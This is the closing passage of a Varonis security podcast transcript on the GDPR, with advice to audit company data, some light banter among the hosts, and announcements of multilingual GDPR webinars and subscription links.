And I think that’s probably the biggest takeaway. The thing to do immediately is to, I think, just do an audit of all of your data. That’s just good practice anyway. If you don’t have that at hand, you should start doing that. Whatever the regulations are, whatever your situation, it’s very, very hard to think of a situation where that wouldn’t be to your advantage. So I think that’s the first thing and most immediate thing any company should do.
Dietrich: That’s a very good point, and it relates to another point within the GDPR, the data protection impact assessments: understanding what you have and making sure you have the appropriate controls around it. So going through that audit directly helps you with the GDPR.
Cindy: Rob, you mentioned there is a webinar on GDPR. When can people tune in?
…
Mike: Rob told me there was a barbecue at his house for the next GDPR meeting. Just come on over, we’ll talk European regulations, smoke some brisket.
Cindy: I need some help from people de-hoarding my studio. First, I need to go home and change all my passwords because I have a password problem. Now you all know I’m a hoarder.
Mike: This is just leading up to you having your own Lifetime television series I mean.
Cindy: That will be exciting.
Mike: I’d watch it.
Cindy: It will be Tiger Mom, 2.0.
Rob: So yeah, we’re having a webinar on July 21st in English, and we’re having another one on July 28th in German. And for anybody who’s interested in the GDPR, we are also doing it on the 28th in French. So we’re offering multiple languages; you can go to varonis.com and just search for GDPR in the upper right-hand corner, and you should be able to find the registration form.
Cindy: Thanks so much, Rob.
Dietrich: Whether you speak it or not. Yeah, fantastic.
Cindy: Thank you so much Mike, Rob, Kilian, Dietrich, and Andy. And thank you all our listeners and viewers for joining us today.
If you want to follow us on Twitter and see what we are up to, you can find us @varonis, V-A-R-O-N-I-S. And if you want to subscribe to this podcast, you can go to iTunes and search for the Inside Out Security show.
There is a video version of this on YouTube that you can subscribe to on the Varonis channel.
And thank you and we’ll see you next week. Bye guys.
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
Check out our free 6-part email course (and earn CPE credits!)
The post GDPR – IOSS 13 appeared first on Varonis Blog.